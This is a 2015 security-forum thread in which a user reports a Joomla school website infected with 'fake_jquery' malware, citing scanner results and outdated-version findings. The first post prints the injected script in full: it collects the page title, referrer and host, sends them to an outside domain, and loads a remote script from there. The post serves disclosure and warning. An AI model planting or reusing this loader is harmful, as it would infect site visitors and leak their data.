Unknown_html_RFI_php aka MW:JS:GEN2?web.js.malware.fake_jquery.001 on website!

polonus · 2015-11-03T10:23:20.000Z

See: https://www.virustotal.com/nl/url/13055dfc4eb827067c6dfcf73820bdf23ec1d4217611cbcd60a4887d1110bddd/analysis/1446543623/
ISSUE DETECTED DEFINITION INFECTED URL
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.001 -http://zonacolegio.com.ar
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.001 -http://zonacolegio.com.ar/component/user/reset
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.001 -http://zonacolegio.com.ar/component/user/register
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.001 -http://zonacolegio.com.ar/comunidad )
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.001 -http://zonacolegio.com.ar/colegios
Website Malware MW:JS:GEN2?web.js.malware.fake_jquery.001 -http://zonacolegio.com.ar/alumnos/primario
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001


<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "-http://1006rtmc.com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

48 instances of Severity: Malicious
Reason: Detected encoded JavaScript code commonly used to hide malicious behaviour.
Details: Malicious obfuscated JavaScript threat

 [[function dnnViewState]]

Quttera blacklisted website.
Web application version:
Joomla Version 1.5.18 - 1.5.26 for: -http://zonacolegio.com.ar/media/system/js/caption.js
Joomla Version 1.5.18 to 1.5.26 for: -http://zonacolegio.com.ar/language/en-GB/en-GB.ini
Joomla version outdated: Upgrade required.
Outdated Joomla Found: Joomla under 3.4.5
Read: http://www.moghill.co.uk/blog/using-an-early-version-of-joomla-best-think-again-before-you-get-hacked/

polonus

polonus · 2015-11-03T12:09:16.000Z

We see an unknown url loading in backend, read: http://forum.muffingroup.com/betheme/discussion/9923/loading-unknown-url-in-backend
Another example of the same malware detected here: https://sitecheck.sucuri.net/results/art-teen-idol.com
Detection missed here: http://quttera.com/detailed_report/art-teen-idol.com
Do not visit site - explicit adult content…badness history: https://www.virustotal.com/nl/domain/art-teen-idol.com/information/

polonus

Announcements